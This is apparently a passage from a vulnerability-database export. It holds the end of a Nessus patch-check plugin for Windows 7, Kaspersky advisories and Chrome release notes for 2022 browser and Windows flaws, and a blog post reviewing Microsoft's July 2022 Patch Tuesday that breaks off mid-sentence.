available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-07';\nkbs = make_list(\n '5015862',\n '5015861'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1',\n sp:1,\n rollup_date:'07_2022',\n bulletin:bulletin,\n rollup_kb_list:[5015862, 5015861])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "kaspersky": [{"lastseen": "2023-12-06T16:36:48", "description": "### *Detect date*:\n07/06/2022\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Browser. Malicious users can exploit these vulnerabilities to execute arbitrary code, cause denial of service.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nMicrosoft Edge (Chromium-based)\n\n### *Solution*:\nInstall necessary updates from the Settings and more menu, that are listed in your About Microsoft Edge page (Microsoft Edge About page usually can be accessed from the Help and feedback option) \n[Microsoft Edge update settings](<https://support.microsoft.com/en-us/topic/microsoft-edge-update-settings-af8aaca2-1b69-4870-94fe-18822dbb7ef1>)\n\n### *Original advisories*:\n[CVE-2022-2294](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-2294>) \n[CVE-2022-2295](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-2295>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Edge](<https://threats.kaspersky.com/en/product/Microsoft-Edge/>)\n\n### *CVE-IDS*:\n[CVE-2022-2295](<https://vulners.com/cve/CVE-2022-2295>)5.0Warning \n[CVE-2022-2294](<https://vulners.com/cve/CVE-2022-2294>)5.0Warning\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-06T00:00:00", "type": "kaspersky", "title": "KLA12579 Multiple vulnerabilities in Microsoft Browser", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-2294", "CVE-2022-2295"], "modified": "2023-09-29T00:00:00", "id": "KLA12579", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12579/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-06T16:34:53", "description": "### *Detect date*:\n07/14/2022\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple vulnerabilities were found in Opera. Malicious users can exploit these vulnerabilities to execute arbitrary code, cause denial of service.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nOpera earlier than 89.0.4447.48\n\n### *Solution*:\nUpdate to the latest version \n[Download Opera](<https://www.opera.com>)\n\n### *Original advisories*:\n[Changelog for 89](<https://blogs.opera.com/desktop/changelog-for-89/#b4447.48>) \n[Stable Channel Update for Desktop](<https://chromereleases.googleblog.com/2022/07/stable-channel-update-for-desktop.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Opera](<https://threats.kaspersky.com/en/product/Opera/>)\n\n### *CVE-IDS*:\n[CVE-2022-2295](<https://vulners.com/cve/CVE-2022-2295>)5.0Warning \n[CVE-2022-2294](<https://vulners.com/cve/CVE-2022-2294>)5.0Warning \n[CVE-2022-2296](<https://vulners.com/cve/CVE-2022-2296>)5.0Warning", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-14T00:00:00", "type": "kaspersky", "title": "KLA12587 Multiple vulnerabilities in Opera", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-2294", "CVE-2022-2295", "CVE-2022-2296"], "modified": "2023-09-29T00:00:00", "id": "KLA12587", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12587/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-06T16:36:59", "description": "### *Detect date*:\n07/04/2022\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple vulnerabilities were found in Google Chrome. Malicious users can exploit these vulnerabilities to cause denial of service, execute arbitrary code.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nGoogle Chrome earlier than 103.0.5060.114\n\n### *Solution*:\nUpdate to the latest version \n[Download Google Chrome](<https://www.google.com/chrome/>)\n\n### *Original advisories*:\n[Stable Channel Update for Desktop](<https://chromereleases.googleblog.com/2022/07/stable-channel-update-for-desktop.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Google Chrome](<https://threats.kaspersky.com/en/product/Google-Chrome/>)\n\n### *CVE-IDS*:\n[CVE-2022-2295](<https://vulners.com/cve/CVE-2022-2295>)5.0Warning \n[CVE-2022-2294](<https://vulners.com/cve/CVE-2022-2294>)5.0Warning \n[CVE-2022-2296](<https://vulners.com/cve/CVE-2022-2296>)5.0Warning", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-04T00:00:00", "type": "kaspersky", "title": "KLA12578 Multiple vulnerabilities in Google Chrome", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-2294", "CVE-2022-2295", "CVE-2022-2296"], "modified": "2023-09-29T00:00:00", "id": "KLA12578", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12578/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-06T16:41:53", "description": "### *Detect date*:\n05/30/2022\n\n### *Severity*:\nHigh\n\n### *Description*:\nA remote code execution vulnerability was found in Microsoft Products (Extended Security Update). Malicious users can exploit this vulnerability to execute arbitrary code.\n\n### *Exploitation*:\nPublic exploits exist for this vulnerability.\n\n### *Affected products*:\nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nMicrosoft Windows Support Diagnostic Tool (MSDT)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2022-30190](<https://vulners.com/cve/CVE-2022-30190>)9.3Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[5014742](<http://support.microsoft.com/kb/5014742>) \n[5014748](<http://support.microsoft.com/kb/5014748>)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-30T00:00:00", "type": "kaspersky", "title": "KLA12550 RCE vulnerability in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-11-28T00:00:00", "id": "KLA12550", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12550/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T16:41:57", "description": "### *Detect date*:\n05/30/2022\n\n### *Severity*:\nHigh\n\n### *Description*:\nA remote code execution vulnerability was found in Microsoft Windows. Malicious users can exploit this vulnerability to execute arbitrary code.\n\n### *Exploitation*:\nPublic exploits exist for this vulnerability.\n\n### *Affected products*:\nWindows 10 Version 20H2 for ARM64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 Version 1809 for 32-bit Systems \nWindows 8.1 for 32-bit systems \nWindows 10 Version 21H1 for 32-bit Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows Server 2012 R2 \nWindows Server, version 20H2 (Server Core Installation) \nWindows Server 2016 \nWindows Server 2019 \nWindows 10 Version 21H2 for 32-bit Systems \nWindows Server 2012 (Server Core installation) \nWindows 10 for x64-based Systems \nWindows Server 2016 (Server Core installation) \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows RT 8.1 \nWindows Server 2022 \nWindows 10 Version 21H1 for x64-based Systems \nWindows 10 Version 21H2 for ARM64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2022 (Server Core installation) \nWindows 11 for ARM64-based Systems \nWindows 11 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows Server 2012 \nWindows 10 Version 21H2 for x64-based Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 8.1 for x64-based systems \nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 20H2 for 32-bit Systems \nWindows Server 2022 Azure Edition Core Hotpatch \nMicrosoft Windows Support Diagnostic Tool (MSDT)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2022-30190](<https://vulners.com/cve/CVE-2022-30190>)9.3Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[5014702](<http://support.microsoft.com/kb/5014702>) \n[5014699](<http://support.microsoft.com/kb/5014699>) \n[5014692](<http://support.microsoft.com/kb/5014692>) \n[5014710](<http://support.microsoft.com/kb/5014710>) \n[5014747](<http://support.microsoft.com/kb/5014747>) \n[5014678](<http://support.microsoft.com/kb/5014678>) \n[5014738](<http://support.microsoft.com/kb/5014738>) \n[5014741](<http://support.microsoft.com/kb/5014741>) \n[5014697](<http://support.microsoft.com/kb/5014697>) \n[5014746](<http://support.microsoft.com/kb/5014746>)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-30T00:00:00", "type": "kaspersky", "title": "KLA12549 RCE vulnerability in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-11-28T00:00:00", "id": "KLA12549", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12549/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "chrome": [{"lastseen": "2023-12-06T20:11:46", "description": "Hi, everyone! We've just released Chrome 103 (103.0.5060.71) for Android: it'll become [available on Google Play](<https://play.google.com/store/apps/details?id=com.android.chrome>) over the next few days.\n\nThis release includes security,stability and performance improvements. You can see a full list of the changes in the [Git log](<https://chromium.googlesource.com/chromium/src/+log/103.0.5060.70..103.0.5060.71?pretty=fuller&n=10000>). \n\n\n\n\n Security Fixes and Rewards\n\nNote: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed.\n\n\n\n\nThis update includes [3](<https://bugs.chromium.org/p/chromium/issues/list?can=1&q=type%3Abug-security+os%3DAndroid%2Cios%2Clinux%2Cmac%2Cwindows%2Call%2Cchrome+label%3ARelease-1-M103>) security fixes. Below, we highlight fixes that were contributed by external researchers. Please see the [Chrome Security Page](<https://sites.google.com/a/chromium.org/dev/Home/chromium-security>) for more information.\n\n\n\n\n[$TBD][[1327312](<https://crbug.com/1341043>)] High CVE-2022-2294: Heap buffer overflow in WebRTC.\n\n[$7500][[1336869](<https://crbug.com/1336869>)] High CVE-2022-2295: Type Confusion in V8. Reported by avaue and Buff3tts at S.S.L. on 2022-06-16\n\n\n\n\nWe would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel.\n\nGoogle is aware that an exploit for CVE-2022-2294 exists in the wild.\n\n\n\nAs usual, our ongoing internal security work was responsible for a wide range of fixes:\n\n * [[1341569](<https://crbug.com/1341569>)] Various fixes from internal audits, fuzzing and other initiatives\n\n\nMany of our security bugs are detected using [AddressSanitizer](<https://code.google.com/p/address-sanitizer/wiki/AddressSanitizer>), [MemorySanitizer](<https://code.google.com/p/memory-sanitizer/wiki/MemorySanitizer>), [UndefinedBehaviorSanitizer](<https://www.chromium.org/developers/testing/undefinedbehaviorsanitizer>), [Control Flow Integrity](<https://sites.google.com/a/chromium.org/dev/developers/testing/control-flow-integrity>), [libFuzzer](<https://sites.google.com/a/chromium.org/dev/developers/testing/libfuzzer>), or [AFL.\n\nIf you find a new issue, please let us know by [filing a bug](<https://code.google.com/p/chromium/issues/entry?template=Android%20Issue>). \n\n\n\nKrishna Govind \n[Google Chrome](<https://www.google.com/chrome/>)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-04T00:00:00", "type": "chrome", "title": "Chrome for Android Update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-2294", "CVE-2022-2295"], "modified": "2022-07-04T00:00:00", "id": "GCSA-7720125337817983232", "href": "https://chromereleases.googleblog.com/2022/07/chrome-for-android-update.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-06T20:11:46", "description": "The Stable channel has been updated to 103.0.5060.114 for Windows. which will roll out over the coming days/weeks. \n\nA full list of changes in this build is available in the [log](<https://chromium.googlesource.com/chromium/src/+log/103.0.5060.53..103.0.5060.114?pretty=fuller&n=10000>). Interested in switching release channels? Find out how [here](<https://www.chromium.org/getting-involved/dev-channel>). If you find a new issue, please let us know by [filing a bug](<https://crbug.com/>). The [community help forum](<https://productforums.google.com/forum/#!forum/chrome>) is also a great place to reach out for help or learn about common issues.\n\n\n\n\n Security Fixes and Rewards\n\nNote: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed.\n\n\n\n\nThis update includes [4](<https://bugs.chromium.org/p/chromium/issues/list?can=1&q=type%3Abug-security+os%3DAndroid%2Cios%2Clinux%2Cmac%2Cwindows%2Call%2Cchrome+label%3ARelease-1-M103>) security fixes. Below, we highlight fixes that were contributed by external researchers. Please see the [Chrome Security Page](<https://sites.google.com/a/chromium.org/dev/Home/chromium-security>) for more information. \n\n[$TBD][[1341043](<https://crbug.com/1341043>)] High CVE-2022-2294: Heap buffer overflow in WebRTC. Reported by Jan Vojtesek from the Avast Threat Intelligence team on 2022-07-01 \n\n[$7500][[1336869](<https://crbug.com/1336869>)] High CVE-2022-2295: Type Confusion in V8. Reported by avaue and Buff3tts at S.S.L. on 2022-06-16 \n\n[$3000][[1327087](<https://crbug.com/1327087>)] High CVE-2022-2296: Use after free in Chrome OS Shell. Reported by Khalil Zhani on 2022-05-19 \n\n\nWe would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel.\n\nGoogle is aware that an exploit for CVE-2022-2294 exists in the wild.\n\n\n\n\n\nAs usual, our ongoing internal security work was responsible for a wide range of fixes:\n\n * [[1338205](<https://crbug.com/1338205>)] Various fixes from internal audits, fuzzing and other initiatives\n\nMany of our security bugs are detected using [AddressSanitizer](<https://code.google.com/p/address-sanitizer/wiki/AddressSanitizer>), [MemorySanitizer](<https://code.google.com/p/memory-sanitizer/wiki/MemorySanitizer>), [UndefinedBehaviorSanitizer](<https://www.chromium.org/developers/testing/undefinedbehaviorsanitizer>), [Control Flow Integrity](<https://sites.google.com/a/chromium.org/dev/developers/testing/control-flow-integrity>), [libFuzzer](<https://sites.google.com/a/chromium.org/dev/developers/testing/libfuzzer>), or [AFL](<https://github.com/google/afl>).\n\n\n\n\nInterested in switching release channels? Find out how [here](<https://www.chromium.org/getting-involved/dev-channel>). If you find a new issue, please let us know by [filing a bug](<https://crbug.com/>). The [community help forum](<https://productforums.google.com/forum/#!forum/chrome>) is also a great place to reach out for help or learn about common issues.\n\n\n\n\n\n\n\n\nPrudhvikumar Bommana\n\nGoogle Chrome", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-04T00:00:00", "type": "chrome", "title": "Stable Channel Update for Desktop", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-2294", "CVE-2022-2295", "CVE-2022-2296"], "modified": "2022-07-04T00:00:00", "id": "GCSA-5089288012050676645", "href": "https://chromereleases.googleblog.com/2022/07/stable-channel-update-for-desktop.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "avleonov": [{"lastseen": "2022-08-14T11:59:47", "description": "Hello everyone! Microsoft has been acting weird lately. I mean the recent [publication of a propaganda report](<https://t.me/avleonovcom/1021>) about evil Russians and how Microsoft is involved in the conflict between countries. It wouldn't be unusual for a US government agency, NSA or CIA to publish such a report. But when a global IT vendor, which, in theory, should be more or less neutral, does this\u2026 This is a clear signal. It's not about business anymore. \n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239096>\n\nI'll take a closer look at this report in the next episode of the Vulnerability Management news, but for now let's take a look at Microsoft July Patch Tuesday. Yes, the vendor is behaving strangely, but Microsoft products need to be patched. Right? At least for now. And tracking vulnerabilities is always a good thing. ![\ud83d\ude42](https://s.w.org/images/core/emoji/14.0.0/72x72/1f642.png)\n\nOn July Patch Tuesday, July 12, 84 vulnerabilities were released. Between June and July Patch Tuesdays, 15 vulnerabilities were released. This gives us 99 vulnerabilities in the report. \n \n \n $ cat comments_links.txt \n Qualys|July 2022 Patch Tuesday. Microsoft Releases 84 Vulnerabilities with 4 Critical, plus 2 Microsoft Edge (Chromium-Based); Adobe Releases 4 Advisories, 27 Vulnerabilities with 18 Critical.|https://blog.qualys.com/vulnerabilities-threat-research/2022/07/12/july-2022-patch-tuesday\n ZDI|The July 2022 Security Update Review|https://www.zerodayinitiative.com/blog/2022/7/12/the-july-2022-security-update-review\n \n $ python3.8 vulristics.py --report-type \"ms_patch_tuesday_extended\" --mspt-year 2022 --mspt-month \"July\" --mspt-comments-links-path \"comments_links.txt\" --rewrite-flag \"True\"\n ...\n Creating Patch Tuesday profile...\n MS PT Year: 2022\n MS PT Month: July\n MS PT Date: 2022-07-12\n MS PT CVEs found: 84\n Ext MS PT Date from: 2022-06-15\n Ext MS PT Date to: 2022-07-11\n Ext MS PT CVEs found: 15\n ALL MS PT CVEs: 99\n ...\n\n * Urgent: 0\n * Critical: 1\n * High: 19\n * Medium: 78\n * Low: 1\n\nInterestingly, in this Patch Tuesday, more than half of all vulnerabilities are EoP.\n\n## CSRSS EoP\n\nWhat can I say, prioritization in [Vulristics](<https://github.com/leonov-av/vulristics>) works correctly. At the top of the July Patch Tuesday list is one critical and actively exploited **Elevation of Privilege** in Windows CSRSS (CVE-2022-22047). This vulnerability has been widely reported in the media.\n\nClient Server Runtime Subsystem, or csrss.exe, is a component of the Windows NT family of operating systems that provides the user mode side of the Win32 subsystem and is included in Windows NT 3.1 and later. Because most of the Win32 subsystem operations have been moved to kernel mode drivers in Windows NT 4 and later, CSRSS is mainly responsible for Win32 console handling and GUI shutdown.\n\nCSRSS runs as a user-mode system service. When a user-mode process calls a function involving console windows, process/thread creation, or side-by-side support, instead of issuing a system call, the Win32 libraries (kernel32.dll, user32.dll, gdi32.dll) send an inter-process call to the CSRSS process which does most of the actual work without compromising the kernel.\n\nThis Elevation of Privilege vulnerability in CSRSS allows an attacker to execute code as SYSTEM, provided they can execute other code on the target. Bugs of this type are typically paired with a code execution bug, usually a specially crafted Office or Adobe document, to take over a system. These attacks often rely on macros, which is why so many were disheartened to hear Microsoft\u2019s delay in blocking all Office macros by default.\n\nMicrosoft says this vulnerability has been exploited in the wild, though no further details have been shared. There is no public exploit yet. Two similar vulnerabilities in CSRSS (CVE-2022-22049 and CVE-2022-22026) were also fixed, likely as a result of Microsoft\u2019s investigation into the in-the-wild exploitation of CVE-2022-22047.\n\n## RPC RCE\n\n**Remote Code Execution** in Remote Procedure Call Runtime (CVE-2022-22038). Here Microsoft has a POC exploit. This July Patch Tuesday bug could allow a remote, unauthenticated attacker to exploit code on an affected system. While not specified in the bulletin, the presumption is that the code execution would occur at elevated privileges. Combine these attributes and you end up with a potentially wormable bug. Microsoft states the attack complexity is high. Additional actions by an attacker are required in order to prepare a target for successful exploitation and an attacker would need to make \u201crepeated exploitation attempts\u201d to take advantage of this bug, but unless you are actively blocking RPC activity, you may not see these attempts.\n\n## Microsoft Edge Memory Corruption\n\nBetween June and July Patch Tuesday, **Memory Corruption** in Microsoft Edge (CVE-2022-2294) was released. Heap buffer overflow in WebRTC, to be precise. WebRTC (Web Real-Time Communication) is a free and open-source project providing web browsers and mobile applications with real-time communication (RTC) via application programming interfaces (APIs). It allows audio and video communication to work inside web pages by allowing direct peer-to-peer communication, eliminating the need to install plugins or download native apps. So, the vulnerability is in the Chromium Open Source Software (OSS) which is consumed by Microsoft Edge. Google is aware that an exploit for this vulnerability exists in the wild. If 